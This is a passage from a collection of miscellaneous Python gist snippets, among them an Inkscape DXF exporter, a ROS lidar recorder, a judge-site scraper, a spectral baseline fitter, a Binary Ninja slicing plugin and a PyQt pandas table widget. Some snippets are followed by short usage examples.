elif field_spec and isinstance(field, serializers.RelatedField):
model = field.queryset.model
field = self.get_pull_serializer(model, read_only=True)
serializer.fields[field_name] = field
self.recursive_select_keys(field, field_spec)
```
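The two pull-spec helpers above are plain functions, so their behaviour is easy to see in isolation. A small runnable sketch; the `name`/`books`/`publisher` field names are made up for illustration:

```python
# Illustrative only; the field names below are assumptions, not from the gist.
spec = ['name', {'books': ['title', {'publisher': ['*']}]}]
print(pull_fields(spec))                            # -> set(['books', 'name']) (order may vary)
print(pull_field_spec(spec, 'books'))               # -> ['title', {'publisher': ['*']}]
print(pull_fields(pull_field_spec(spec, 'books')))  # -> set(['publisher', 'title'])
```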
#### File: hard-gists/ee9151b0ad985ca348cd/snippet.py
```python
import inkex, simplepath, simpletransform, cubicsuperpath, cspsubdiv, dxf_templates_b2, re
class MyEffect(inkex.Effect):
def __init__(self):
inkex.Effect.__init__(self)
self.dxf = ''
self.handle = 255
self.flatness = 0.1
def output(self):
print self.dxf
def dxf_add(self, str):
self.dxf += str
def dxf_insert_code(self, code, value):
self.dxf += code + "\n" + value + "\n"
def dxf_line(self,layer,csp):
self.dxf_insert_code( '0', 'LINE' )
self.dxf_insert_code( '8', layer )
self.dxf_insert_code( '62', '4' )
self.dxf_insert_code( '5', '%x' % self.handle )
self.dxf_insert_code( '100', 'AcDbEntity' )
self.dxf_insert_code( '100', 'AcDbLine' )
self.dxf_insert_code( '10', '%f' % csp[0][0] )
self.dxf_insert_code( '20', '%f' % csp[0][1] )
self.dxf_insert_code( '30', '0.0' )
self.dxf_insert_code( '11', '%f' % csp[1][0] )
self.dxf_insert_code( '21', '%f' % csp[1][1] )
self.dxf_insert_code( '31', '0.0' )
def dxf_point(self,layer,x,y):
self.dxf_insert_code( '0', 'POINT' )
self.dxf_insert_code( '8', layer )
self.dxf_insert_code( '62', '4' )
self.dxf_insert_code( '5', '%x' % self.handle )
self.dxf_insert_code( '100', 'AcDbEntity' )
self.dxf_insert_code( '100', 'AcDbPoint' )
self.dxf_insert_code( '10', '%f' % x )
self.dxf_insert_code( '20', '%f' % y )
self.dxf_insert_code( '30', '0.0' )
def dxf_path_to_lines(self,layer,p):
f = self.flatness
is_flat = 0
while is_flat < 1:
try:
cspsubdiv.cspsubdiv(p, self.flatness)
is_flat = 1
except:
f += 0.1
for sub in p:
for i in range(len(sub)-1):
self.handle += 1
s = sub[i]
e = sub[i+1]
self.dxf_line(layer,[s[1],e[1]])
def dxf_path_to_point(self,layer,p):
bbox = simpletransform.roughBBox(p)
x = (bbox[0] + bbox[1]) / 2
y = (bbox[2] + bbox[3]) / 2
self.dxf_point(layer,x,y)
def effect(self):
self.dxf_insert_code( '999', 'Inkscape export via "Better Better DXF Output" (http://tim.cexx.org/?p=590)' )
self.dxf_add( dxf_templates_b2.r14_header )
scale = 25.4/90.0
h = self.unittouu(self.document.getroot().xpath('@height',namespaces=inkex.NSS)[0])
path = '//svg:path'
# run thru entire document gathering a list of layers to generate a proper DXF LAYER table. There is probably a better way to do this.
layers=[];
for node in self.document.getroot().xpath(path, namespaces=inkex.NSS):
layer = node.getparent().get(inkex.addNS('label','inkscape'))
if layer == None:
layer = 'Default'
if not layer in layers:
layers.append(layer)
self.dxf_insert_code('0', 'TABLE')
self.dxf_insert_code('2', 'LAYER')
self.dxf_insert_code('5', '2')
self.dxf_insert_code('330', '0')
self.dxf_insert_code('100', 'AcDbSymbolTable')
# group code 70 tells a reader how many table records to expect (e.g. pre-allocate memory for).
# It must be greater or equal to the actual number of records
self.dxf_insert_code('70',str(len(layers)))
for layer in layers:
self.dxf_insert_code('0', 'LAYER')
self.dxf_insert_code('5', '10')
self.dxf_insert_code('330', '2')
self.dxf_insert_code('100', 'AcDbSymbolTableRecord')
self.dxf_insert_code('100', 'AcDbLayerTableRecord')
self.dxf_insert_code('2', layer)
self.dxf_insert_code('70', '0')
self.dxf_insert_code('62', '7')
self.dxf_insert_code('6', 'CONTINUOUS')
self.dxf_insert_code('0','ENDTAB')
self.dxf_insert_code('0','ENDSEC')
self.dxf_add( dxf_templates_b2.r14_blocks )
# Generate actual geometry...
for node in self.document.getroot().xpath(path,namespaces=inkex.NSS):
layer = node.getparent().get(inkex.addNS('label','inkscape'))
if layer == None:
layer = 'Default' # Layer 1
d = node.get('d')
p = cubicsuperpath.parsePath(d)
t = node.get('transform')
if t != None:
m = simpletransform.parseTransform(t)
simpletransform.applyTransformToPath(m,p)
m = [[scale,0,0],[0,-scale,h*scale]]
simpletransform.applyTransformToPath(m,p)
if re.search('drill$',layer,re.I) == None:
#if layer == 'Brackets Drill':
self.dxf_path_to_lines(layer,p)
else:
self.dxf_path_to_point(layer,p)
self.dxf_add( dxf_templates_b2.r14_footer )
e = MyEffect()
e.affect()
```
#### File: hard-gists/eeb156dc7b4caca69f5b31037da54708/snippet.py
```python
import sys
##sys.path.insert(0,'/opt/ros/kinetic/lib/python2.7/dist-packages')
##sys.path.insert(0,'/usr/lib/python2.7/dist-packages') ## rospkg
import os
#os.system('source /opt/ros/kinetic/setup.bash')
import numpy as np
import rospy
from sensor_msgs.msg import PointCloud2, PointField
#---------------------------------------------------------------------------------------------------------
# PointCloud2 to array
# https://gist.github.com/dlaz/11435820
# https://github.com/pirobot/ros-by-example/blob/master/rbx_vol_1/rbx1_apps/src/point_cloud2.py
# http://answers.ros.org/question/202787/using-pointcloud2-data-getting-xy-points-in-python/
# https://github.com/eric-wieser/ros_numpy/blob/master/src/ros_numpy/point_cloud2.py
# https://github.com/eric-wieser/ros_numpy #############################################################################################
DUMMY_FIELD_PREFIX = '__'
# mappings between PointField types and numpy types
type_mappings = [(PointField.INT8, np.dtype('int8')), (PointField.UINT8, np.dtype('uint8')), (PointField.INT16, np.dtype('int16')),
(PointField.UINT16, np.dtype('uint16')), (PointField.INT32, np.dtype('int32')), (PointField.UINT32, np.dtype('uint32')),
(PointField.FLOAT32, np.dtype('float32')), (PointField.FLOAT64, np.dtype('float64'))]
pftype_to_nptype = dict(type_mappings)
nptype_to_pftype = dict((nptype, pftype) for pftype, nptype in type_mappings)
# sizes (in bytes) of PointField types
pftype_sizes = {PointField.INT8: 1, PointField.UINT8: 1, PointField.INT16: 2, PointField.UINT16: 2,
PointField.INT32: 4, PointField.UINT32: 4, PointField.FLOAT32: 4, PointField.FLOAT64: 8}
def fields_to_dtype(fields, point_step):
'''
Convert a list of PointFields to a numpy record datatype.
'''
offset = 0
np_dtype_list = []
for f in fields:
while offset < f.offset:
# might be extra padding between fields
np_dtype_list.append(('%s%d' % (DUMMY_FIELD_PREFIX, offset), np.uint8))
offset += 1
dtype = pftype_to_nptype[f.datatype]
if f.count != 1:
dtype = np.dtype((dtype, f.count))
np_dtype_list.append((f.name, dtype))
offset += pftype_sizes[f.datatype] * f.count
# might be extra padding between points
while offset < point_step:
np_dtype_list.append(('%s%d' % (DUMMY_FIELD_PREFIX, offset), np.uint8))
offset += 1
return np_dtype_list
def msg_to_arr(msg):
dtype_list = fields_to_dtype(msg.fields, msg.point_step)
arr = np.fromstring(msg.data, dtype_list)
# remove the dummy fields that were added
arr = arr[[fname for fname, _type in dtype_list if not (fname[:len(DUMMY_FIELD_PREFIX)] == DUMMY_FIELD_PREFIX)]]
if msg.height == 1:
return np.reshape(arr, (msg.width,))
else:
return np.reshape(arr, (msg.height, msg.width))
##################################################################################################################################
lidar_dir = '/root/share/project/didi/data/didi/didi-2/Data/1/15/lidar'
##lidar_dir = '/root/share/project/didi/data/didi/didi-2/Out/Round_1_Test/19_f2/lidar'
def callback(msg):
timestamp = msg.header.stamp.to_nsec()
print('callback: msg : seq=%d, timestamp=%19d'%(
msg.header.seq, timestamp
))
arr= msg_to_arr(msg)
file=lidar_dir+'/%19d.npy'%(
timestamp
)
np.save(file,arr)
#dd=0
pass
if __name__=='__main__':
print( '%s: calling main function ... ' % os.path.basename(__file__))
if not os.path.exists(lidar_dir):
os.makedirs(lidar_dir)
rospy.init_node('velodyne_subscriber')
velodyne_subscriber = rospy.Subscriber('/velodyne_points', PointCloud2, callback)
rospy.spin()
print( 'success' )
```
#### File: hard-gists/ef9e5c352e54769c4d43/snippet.py
```python
import requests
from bs4 import BeautifulSoup as bs
from itertools import chain, filterfalse
langs = {'python': ['(py)', '(pypy)', '(py3)'],
'ruby': ['(rb)']}
def get_pids(maxpage=17):
""" gatter problem ids and return it one by one """
baseurl = 'https://algospot.com/judge/problem/list/%d'
for pagenum in range(1, maxpage+1):
page = requests.get(baseurl % pagenum, timeout=None)
soup = bs(page.text)
tds = soup.find_all('td', class_='id')
for p in tds:
yield p.find('a').text.strip()
def solved_with(lang):
""" return a filter that checks if provided problem is ever solved with the
language or not
"""
if lang not in langs:
raise
target = langs[lang]
baseurl = 'https://algospot.com/judge/problem/stat/%(pid)s/%(page)d/'
def f(pid):
firstpage = requests.get(baseurl % {'pid': pid, 'page': 1})
soup = bs(firstpage.text)
maxpage = soup.find('span', class_='step-links').find_all('a')[-1].text
for pagenum in range(1, int(maxpage)+1):
page = requests.get(baseurl % {'pid': pid, 'page': pagenum})
soup = bs(page.text)
tds = chain(soup.find_all('td', class_='fastest'),
soup.find_all('td', class_='shortest'))
ans = ''.join(td.text for td in tds)
if any(t in ans for t in target):
return True
return False
return f
def solved_by(uid):
""" return a filter that checks if provided problem is ever solved by the
user or not. user is specified by user id, shown in his profile page url.
for example user fleo0917(https://algospot.com/user/profile/13227)'s user
id is '13227'
"""
solved = set()
baseurl = 'https://algospot.com/judge/problem/list/%(page)d?verdict=solved&user_tried=%(uid)s'
firstpage = requests.get(baseurl % {'uid': uid, 'page': 1})
soup = bs(firstpage.text)
maxpage = soup.find('span', class_='step-links').find_all('a')[-1].text
for pagenum in range(1, int(maxpage)+1):
page = requests.get(baseurl % {'uid': uid, 'page': pagenum})
soup = bs(page.text)
tds = soup.find_all('td', class_='id')
for p in tds:
solved.add(p.find('a').text.strip())
def f(pid):
return pid in solved
return f
def gen_url(pid):
""" return problem definition url """
return 'https://algospot.com/judge/problem/read/%s' % pid
if __name__ == '__main__':
probs = get_pids()
probs = filter(solved_with('python'), probs)
probs = filterfalse(solved_by('13227'), probs)
for p in probs:
print('[%s](%s)' % (p, gen_url(p)))
```
#### File: hard-gists/efabc30c4b2c9afd8a83/snippet.py
```python
import numpy as np
from scipy.linalg import solveh_banded
def als_baseline(intensities, asymmetry_param=0.05, smoothness_param=1e6,
max_iters=10, conv_thresh=1e-5, verbose=False):
'''Computes the asymmetric least squares baseline.
* http://www.science.uva.nl/~hboelens/publications/draftpub/Eilers_2005.pdf
smoothness_param: Relative importance of smoothness of the predicted response.
asymmetry_param (p): if y > z, w = p, otherwise w = 1-p.
Setting p=1 is effectively a hinge loss.
'''
smoother = WhittakerSmoother(intensities, smoothness_param, deriv_order=2)
# Rename p for concision.
p = asymmetry_param
# Initialize weights.
w = np.ones(intensities.shape[0])
for i in xrange(max_iters):
z = smoother.smooth(w)
mask = intensities > z
new_w = p*mask + (1-p)*(~mask)
conv = np.linalg.norm(new_w - w)
if verbose:
print i+1, conv
if conv < conv_thresh:
break
w = new_w
else:
print 'ALS did not converge in %d iterations' % max_iters
return z
class WhittakerSmoother(object):
def __init__(self, signal, smoothness_param, deriv_order=1):
self.y = signal
assert deriv_order > 0, 'deriv_order must be an int > 0'
# Compute the fixed derivative of identity (D).
d = np.zeros(deriv_order*2 + 1, dtype=int)
d[deriv_order] = 1
d = np.diff(d, n=deriv_order)
n = self.y.shape[0]
k = len(d)
s = float(smoothness_param)
# Here be dragons: essentially we're faking a big banded matrix D,
# doing s * D.T.dot(D) with it, then taking the upper triangular bands.
diag_sums = np.vstack([
np.pad(s*np.cumsum(d[-i:]*d[:i]), ((k-i,0),), 'constant')
for i in xrange(1, k+1)])
upper_bands = np.tile(diag_sums[:,-1:], n)
upper_bands[:,:k] = diag_sums
for i,ds in enumerate(diag_sums):
upper_bands[i,-i-1:] = ds[::-1][:i+1]
self.upper_bands = upper_bands
def smooth(self, w):
foo = self.upper_bands.copy()
foo[-1] += w # last row is the diagonal
return solveh_banded(foo, w * self.y, overwrite_ab=True, overwrite_b=True)
```
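A small usage sketch (not part of the original gist): estimating and removing a slowly varying baseline from a synthetic two-peak spectrum with the function above.

```python
# Synthetic spectrum: two Gaussian peaks sitting on a quadratic drift.
import numpy as np

x = np.linspace(0, 100, 1000)
drift = 0.002 * (x - 50) ** 2
peaks = np.exp(-(x - 30) ** 2 / 2.0) + 0.5 * np.exp(-(x - 70) ** 2 / 8.0)
signal = drift + peaks

# A small asymmetry_param pushes the fit under the peaks rather than through them.
baseline = als_baseline(signal, asymmetry_param=0.01, smoothness_param=1e6)
corrected = signal - baseline
```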
#### File: hard-gists/f112560fd04ce43c53d4/snippet.py
```python
from xml.etree import ElementTree
from collections import defaultdict
from dateutil.parser import parse as datetime_parser
def read_report_from_file(filename):
with open(filename) as fsock:
return read_report_from_string(fsock.read())
def read_report_from_string(report_string):
xml_root = ElementTree.fromstring(report_string)
return Report(xml_root)
class Report(object):
def __init__(self, xml):
self._xml = xml
@property
def id(self):
return self._xml.get('id')
@property
def type(self):
return self._xml.get('type')
@property
def start(self):
return datetime_parser(self._xml.find('start').text, ignoretz=True)
@property
def end(self):
return datetime_parser(self._xml.find('end').text, ignoretz=True)
@property
def state(self):
return self._xml.find('state').text
@property
def resource(self):
return self._xml.find('resource').text
@property
def events(self):
return [Event(x) for x in self._xml.findall('event')]
@property
def events_by_type(self):
events_by_type = defaultdict(lambda: [])
for event in self.events:
events_by_type[event.command].append(event)
return events_by_type
def duration(self):
return self.end - self.start
def command_start_time(self, command, relative=False):
events_for_command = self.events_by_type[command]
command_start_time = events_for_command[0].time
return command_start_time - self.start if relative else command_start_time
class Event(object):
def __init__(self, xml):
self._xml = xml
@property
def command(self):
return self._xml.get('command')
@property
def time(self):
return datetime_parser(self._xml.find('time').text, ignoretz=True)
@property
def state(self):
return self._xml.find('state').text
def __repr__(self):
return "{0} {1} {2}".format(self.command, self.time, self.state)
```
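A short usage sketch (not part of the original gist) with a hand-written report document that matches the element and attribute names the classes above look for:

```python
# Minimal example document; element names follow what Report/Event expect.
report_xml = """
<report id="r1" type="provision">
  <start>2015-01-01T10:00:00</start>
  <end>2015-01-01T10:05:30</end>
  <state>done</state>
  <resource>node-7</resource>
  <event command="boot">
    <time>2015-01-01T10:00:05</time>
    <state>ok</state>
  </event>
</report>
"""

report = read_report_from_string(report_xml)
print(report.duration())                                  # 0:05:30
print(report.command_start_time('boot', relative=True))   # 0:00:05
```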
#### File: hard-gists/f15921b2257af1db953f/snippet.py
```python
from datetime import datetime, timezone, timedelta
# usage: naturaltime.to_text(some_datetime)
def past(dt, dif):
if dif.days > 2:
return '%d days ago' % int(dif.days)
if dif.days > 1:
return 'yesterday at %s' % dt.strftime('%I:%M %p')
if dif.seconds <= 60:
return '%d seconds ago' % int(dif.seconds)
if dif.seconds <= (60 * 10):
return '%d minutes, %d seconds ago' % \
(int(dif.seconds / 60), int(dif.seconds) % 60)
if dif.seconds <= (60 * 60):
return 'about %d minutes ago' % int(dif.seconds / 60)
return '%d hours, %d minutes ago' % \
(int(dif.seconds / (60 * 60)), int(dif.seconds / 60) % 60)
def future(dt, dif):
if dif.days > 2:
return 'in %d days time' % int(dif.days)
if dif.days > 1:
return 'tomorrow at %s' % dt.strftime('%I:%M %p')
if dif.seconds <= 60:
return '%d seconds from now' % int(dif.seconds)
if dif.seconds <= (60 * 10):
return '%d minutes, %d seconds from now' % \
(int(dif.seconds / 60), int(dif.seconds) % 60)
if dif.seconds <= (60 * 60):
return 'about %d minutes from now' % int(dif.seconds / 60)
return '%d hours, %d minutes from now' % \
(int(dif.seconds / (60 * 60)), int(dif.seconds / 60) % 60)
def to_text(dt):
now = datetime.now(timezone.utc)
dif = dt - now
smalld = timedelta(seconds=5)
if dif < smalld:
if abs(dif) < smalld: return 'just now'
return past(dt, abs(dif))
else:
if abs(dif) < smalld: return 'now'
return future(dt, abs(dif))
```
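A short usage sketch, not part of the original gist; it assumes the calls run in the same file or that the module is importable under the name the header comment suggests (`naturaltime`).

```python
# Example calls; to_text() recomputes "now" internally, so results for large
# offsets can land one unit lower than the nominal delta.
now = datetime.now(timezone.utc)
print(to_text(now - timedelta(minutes=3)))        # '3 minutes, 0 seconds ago'
print(to_text(now + timedelta(days=5, hours=1)))  # 'in 5 days time'
print(to_text(now))                               # 'just now'
```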
#### File: hard-gists/f28b7a2d3356a0ed39823aaea66b50d0/snippet.py
```python
from binaryninja import (
SSAVariable, HighlightStandardColor, PluginCommand
)
def do_backward_slice(instruction, function):
# switch to SSA form (this does nothing if it's already SSA).
instruction_queue = set([instruction.ssa_form.instr_index])
visited_instructions = set()
variables = set()
while instruction_queue:
visit_index = instruction_queue.pop()
if visit_index is None or visit_index in visited_instructions:
continue
instruction_to_visit = function[visit_index]
if instruction_to_visit is None:
continue
for new_var in instruction_to_visit.vars_read:
instruction_queue.add(
function.get_ssa_var_definition(
new_var
)
)
variables.update(
[(var.var.identifier, var.version)
for var in instruction_to_visit.vars_read]
)
visited_instructions.add(visit_index)
return visited_instructions
def do_forward_slice(instruction, function):
# if the first operand is not an SSAVariable then we won't slice it.
if not isinstance(instruction.ssa_form.operands[0], SSAVariable):
return set()
variables = set()
operand = instruction.ssa_form.operands[0]
variables.add((operand.var.identifier, operand.version))
instruction_queue = set()
instruction_queue.update(
function.ssa_form.get_ssa_var_uses(
operand
)
)
visited_instructions = set()
visited_instructions.add(instruction.ssa_form.instr_index)
while instruction_queue:
visit_index = instruction_queue.pop()
if visit_index is None or visit_index in visited_instructions:
continue
instruction_to_visit = function[visit_index]
if instruction_to_visit is None:
continue
for new_var in instruction_to_visit.vars_written:
instruction_queue.update(
function.get_ssa_var_uses(
new_var
)
)
variables.add(
(new_var.var.identifier, new_var.version)
)
visited_instructions.add(visit_index)
return visited_instructions
def program_slice(instruction, direction, color=None):
function = instruction.function.ssa_form
bv = function.source_function.view
if color is None:
color = HighlightStandardColor.BlueHighlightColor
if direction == 'backward':
visited_instructions = do_backward_slice(instruction, function)
if direction == 'forward':
visited_instructions = do_forward_slice(instruction, function)
bv.begin_undo_actions()
for visited_instruction in visited_instructions:
function.source_function.set_user_instr_highlight(
function[visited_instruction].address,
color
)
bv.commit_undo_actions()
def backward_slice(bv, addr):
function = bv.get_basic_blocks_at(addr)[0].function
instruction = function.get_low_level_il_at(addr).mapped_medium_level_il
program_slice(instruction, 'backward')
def forward_slice(bv, addr):
function = bv.get_basic_blocks_at(addr)[0].function
instruction = function.get_low_level_il_at(addr).mapped_medium_level_il
program_slice(instruction, 'forward')
PluginCommand.register_for_address(
'Slice backwards',
'Slice variable backwards from this point',
backward_slice)
PluginCommand.register_for_address(
'Slice forward',
'Slice variable forward from this point',
forward_slice
)
```
#### File: hard-gists/f2bb0cc876828b54f2ed/snippet.py
```python
import sip
sip.setapi('QString', 2)
sip.setapi('QVariant', 2)
import pandas
import operator
from PyQt4 import QtGui, QtCore
import sys
from functools import partial
class WidgetedCell(object):
"""Set as the value of an element in a pandas DataFrame to create a widget
NOTE: You may also want your widget to implement the getWidgetedCellState and setWidgetedCellState
methods so that interactions with the controlls persist.
"""
def __init__(self, widget):
"""Create a widget in the DataFrameWidget's cell
Args:
widget (subclass of QWidget)
Widget to display in cell. The constructor of `widget` must
accept only one argument, the parent widget to
build `widget` inside of
"""
self.widget = widget
def __repr__(self):
return repr(self.widget)
class DataFrameModel(QtCore.QAbstractTableModel):
""" data model for a DataFrame class """
RawDataRole = 64 # Custom Role, http://qt-project.org/doc/qt-4.8/qt.html#ItemDataRole-enum
RawIndexRole = 65
def __init__(self):
super(DataFrameModel, self).__init__()
self._df = pandas.DataFrame()
self._orig_df = pandas.DataFrame()
self._pre_dyn_filter_df = None
self._resort = lambda : None # Null resort functon
def setDataFrame(self, dataFrame):
"""Set or change pandas DataFrame to show"""
self.df = dataFrame
self._orig_df = dataFrame.copy()
self._pre_dyn_filter_df = None # Clear dynamic filter
@property
def df(self):
return self._df
@df.setter
def df(self, dataFrame):
"""Setter should only be used internal to DataFrameModel. Others should use setDataFrame()"""
self.modelAboutToBeReset.emit()
self._df = dataFrame
self.modelReset.emit()
@QtCore.pyqtSlot()
def beginDynamicFilter(self):
"""Effects of using the "filter" function will not become permanent until endDynamicFilter called"""
if self._pre_dyn_filter_df is None:
print "NEW DYNAMIC FILTER MODEL"
self._pre_dyn_filter_df = self.df.copy()
else:
# Already dynamically filtering, so don't override that
print "SAME DYNAMIC FILTER MODEL"
pass
@QtCore.pyqtSlot()
def endDynamicFilter(self):
"""Makes permanent the effects of the dynamic filter"""
print " * * * RESETING DYNAMIC"
self._pre_dyn_filter_df = None
@QtCore.pyqtSlot()
def cancelDynamicFilter(self):
"""Cancel the dynamic filter"""
self.df = self._pre_dyn_filter_df.copy()
self._pre_dyn_filter_df = None
#------------- table display functions -----------------
def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
if role != QtCore.Qt.DisplayRole:
return None
if orientation == QtCore.Qt.Horizontal:
try:
return '%s' % self.df.columns.tolist()[section]
except (IndexError, ):
return QtCore.QVariant()
elif orientation == QtCore.Qt.Vertical:
try:
return '%s' % self.df.index.tolist()[section]
except (IndexError, ):
return QtCore.QVariant()
def data(self, index, role=QtCore.Qt.DisplayRole):
#if role == QtCore.Qt.BackgroundRole:
# return QtGui.QColor(255,255,204)
if role in (QtCore.Qt.DisplayRole, DataFrameModel.RawDataRole, DataFrameModel.RawIndexRole):
if not index.isValid():
return QtCore.QVariant()
if role == DataFrameModel.RawIndexRole:
r = self.df.index[index.row()]
c = self.df.columns[index.column()]
return (r, c)
data = self.df.iloc[index.row(), index.column()]
if role == DataFrameModel.RawDataRole:
return data
if pandas.isnull(data):
return QtCore.QVariant()
return '%s' % data
else:
return None
def flags(self, index):
defaults = super(DataFrameModel, self).flags(index)
data = self.data(index, DataFrameModel.RawDataRole)
if isinstance(data, WidgetedCell):
return defaults | QtCore.Qt.ItemIsEditable
return defaults
def __setData(self, index, value, role):
row = self.df.index[index.row()]
col = self.df.columns[index.column()]
if hasattr(value, 'toPyObject'):
# PyQt4 gets a QVariant
value = value.toPyObject()
else:
# PySide gets an unicode
dtype = self.df[col].dtype
if dtype != object:
value = None if value == '' else dtype.type(value)
self.df.set_value(row, col, value)
self.dataChanged.emit()
return True
def rowCount(self, index=QtCore.QModelIndex()):
return self.df.shape[0]
def columnCount(self, index=QtCore.QModelIndex()):
return self.df.shape[1]
def sort(self, col_ix, order = QtCore.Qt.AscendingOrder):
if col_ix >= self.df.shape[1]:
# Column out of bounds
return
self.layoutAboutToBeChanged.emit()
ascending = True if order == QtCore.Qt.AscendingOrder else False
self.df = self.df.sort(self.df.columns[col_ix], ascending=ascending)
self.layoutChanged.emit()
# Set sorter to current sort (for future filtering)
self._resort = partial(self.sort, col_ix, order)
def filter(self, col_ix, needle):
"""Filter DataFrame view. Case Insenstive.
Fitlers the DataFrame view to include only rows who's value in col
contains the needle. EX: a needle of "Ab" will show rows with
"absolute" and "REABSOLVE".
Args:
col_ix (int)
Column index in df to filter
needle (str)
String to search df_view for
"""
if self._pre_dyn_filter_df is not None:
df = self._pre_dyn_filter_df.copy()
else:
df = self.df
col = df.columns[col_ix]
# Create lowercase string version of column as series
s_lower = df[col].astype('str').str.lower()
# Make needle lower case too
needle = str(needle).lower()
# Actually filter
self.df = df[s_lower.str.contains(str(needle))]
# Resort
self._resort()
def filterIsIn(self, col_ix, include):
df = self._orig_df
col = self.df.columns[col_ix]
# Convert to string
s_col = df[col].astype('str')
# Filter
self.df = df[s_col.isin(include)]
# Resort
self._resort()
def filterFunction(self, col_ix, function):
df = self.df
col = self.df.columns[col_ix]
self.df = df[function(df[col])]
# Resort
self._resort()
def reset(self):
self.df = self._orig_df.copy()
self._resort = lambda: None
self._pre_dyn_filter_df = None
class DataFrameSortFilterProxyModel(QtGui.QSortFilterProxyModel):
def __init__(self):
super(DataFrameSortFilterProxyModel, self).__init__()
self._accepted_rows = []
self._source_df = None
self._refilter = lambda: None
def setSourceModel(self, source_model):
super(DataFrameSortFilterProxyModel, self).setSourceModel(source_model)
source_model.modelReset.connect(self._source_model_changed)
self._source_model_changed()
def sort(self, *args):
# Delegate sorting to the underyling model
self.sourceModel().sort(*args)
def _source_model_changed(self):
self._source_df = self.sourceModel().df
# Accept all rows
self._accepted_rows = xrange(0, self._source_df.shape[0])
print "SOURCE MODEL CHANGED", len(self._accepted_rows)
if len(self._accepted_rows) > 0:
self.setFilterString('') # Reset the filter
self._refilter()
def setFilterString(self, needle):
"""Filter DataFrame using df[col].str.contains(needle). Case insensitive."""
df = self._source_df
col = df.columns[self.filterKeyColumn()]
# Create lowercase string version of column as series
s_lower = df[col].astype('str').str.lower()
# Make needle lower case too
needle = str(needle).lower()
mask = s_lower.str.contains(str(needle))
self._filter_using_mask(mask)
self._refilter = partial(self.setFilterString, needle)
def setFilterList(self, filter_list):
"""Filter DataFrame using df[col].isin(filter_list)."""
df = self._source_df
col = df.columns[self.filterKeyColumn()]
mask = df[col].isin(filter_list)
self._filter_using_mask(mask)
def setFilterFunction(self, func):
"""Filter DataFrame using df[col].apply(func). Func should return True or False"""
df = self._source_df
col = df.columns[self.filterKeyColumn()]
mask = df[col].apply(func)
self._filter_using_mask(mask)
def _filter_using_mask(self, mask):
# Actually filter (need *locations* of filtered values)
df = self._source_df
col = df.columns[self.filterKeyColumn()]
ilocs = pandas.DataFrame(range(len(df)))
ilocs = ilocs[mask.reset_index(drop=True)]
self.modelAboutToBeReset.emit()
self._accepted_rows = ilocs.index
self.modelReset.emit()
@property
def df(self):
return self._source_df.iloc[self._accepted_rows]
@df.setter
def df(self, val):
raise AttributeError("Tried to set the dataframe of DataFrameSortFilterProxyModel")
def filterAcceptsRow(self, row, idx):
return row in self._accepted_rows
def filterAcceptsColumn(self, col, idx):
# Columns are hidden manually. No need for this
return True
def setFilterRegExp(self, *args):
raise NotImplementedError("Use setFilterString, setFilterList, or setFilterFunc instead")
def setFilterWildcard(self, *args):
raise NotImplementedError("Use setFilterString, setFilterList, or setFilterFunc instead")
def setFilterFixedString(self, *args):
raise NotImplementedError("Use setFilterString, setFilterList, or setFilterFunc instead")
class DynamicFilterLineEdit(QtGui.QLineEdit):
"""Filter textbox for a DataFrameTable"""
def __init__(self, *args, **kwargs):
self._always_dynamic = kwargs.pop('always_dynamic', False)
super(DynamicFilterLineEdit, self).__init__(*args, **kwargs)
self.col_to_filter = None
self._orig_df = None
self._host = None
def bind_dataframewidget(self, host, col_ix):
"""Bind tihs DynamicFilterLineEdit to a DataFrameTable's column
Args:
host (DataFrameWidget)
Host to filter
col_ix (int)
Index of column of host to filter
"""
self.host = host
self.col_to_filter = col_ix
self.textChanged.connect(self._update_filter)
@property
def host(self):
if self._host is None:
raise RuntimeError("Must call bind_dataframewidget() "
"before use.")
else:
return self._host
@host.setter
def host(self, value):
if not isinstance(value, DataFrameWidget):
raise ValueError("Must bind to a DataFrameWidget, not %s" % value)
else:
self._host = value
if not self._always_dynamic:
self.editingFinished.connect(self._host._data_model.endDynamicFilter)
def focusInEvent(self, QFocusEvent):
self._host._data_model.beginDynamicFilter()
def _update_filter(self, text):
"""Called everytime we type in the filter box"""
col_ix = self.col_to_filter
self.host.filter(col_ix, text)
class DynamicFilterMenuAction(QtGui.QWidgetAction):
"""Filter textbox in column-header right-click menu"""
def __init__(self, parent, menu, col_ix):
"""Filter textbox in column right-click menu
Args:
parent (DataFrameWidget)
Parent who owns the DataFrame to filter
menu (QMenu)
Menu object I am located on
col_ix (int)
Index of column used in pandas DataFrame we are to filter
"""
super(DynamicFilterMenuAction, self).__init__(parent)
# State
self.parent_menu = menu
# Build Widgets
widget = QtGui.QWidget()
layout = QtGui.QHBoxLayout()
self.label = QtGui.QLabel('Filter')
self.text_box = DynamicFilterLineEdit()
self.text_box.bind_dataframewidget(self.parent(), col_ix)
self.text_box.returnPressed.connect(self._close_menu)
layout.addWidget(self.label)
layout.addWidget(self.text_box)
widget.setLayout(layout)
self.setDefaultWidget(widget)
def _close_menu(self):
"""Gracefully handle menu"""
self.parent_menu.close()
class FilterListMenuWidget(QtGui.QWidgetAction):
"""Filter textbox in column-right click menu"""
def __init__(self, parent, menu, col_ix):
"""Filter textbox in column right-click menu
Args:
parent (DataFrameWidget)
Parent who owns the DataFrame to filter
menu (QMenu)
Menu object I am located on
col_ix (int)
Column index used in pandas DataFrame we are to filter
label (str)
Label in popup menu
"""
super(FilterListMenuWidget, self).__init__(parent)
# State
self.menu = menu
self.col_ix = col_ix
# Build Widgets
widget = QtGui.QWidget()
layout = QtGui.QVBoxLayout()
self.list = QtGui.QListWidget()
self.list.setFixedHeight(100)
layout.addWidget(self.list)
widget.setLayout(layout)
self.setDefaultWidget(widget)
# Signals/slots
self.list.itemChanged.connect(self.on_list_itemChanged)
self.parent().dataFrameChanged.connect(self._populate_list)
self._populate_list(inital=True)
def _populate_list(self, inital=False):
self.list.clear()
df = self.parent()._data_model._orig_df
col = df.columns[self.col_ix]
full_col = set(df[col]) # All Entries possible in this column
disp_col = set(self.parent().df[col]) # Entries currently displayed
def _build_item(item, state=None):
i = QtGui.QListWidgetItem('%s' % item)
i.setFlags(i.flags() | QtCore.Qt.ItemIsUserCheckable)
if state is None:
if item in disp_col:
state = QtCore.Qt.Checked
else:
state = QtCore.Qt.Unchecked
i.setCheckState(state)
i.checkState()
self.list.addItem(i)
return i
# Add a (Select All)
if full_col == disp_col:
select_all_state = QtCore.Qt.Checked
else:
select_all_state = QtCore.Qt.Unchecked
self._action_select_all = _build_item('(Select All)', state=select_all_state)
# Add filter items
if inital:
build_list = full_col
else:
build_list = disp_col
for i in sorted(build_list):
_build_item(i)
# Add a (Blanks)
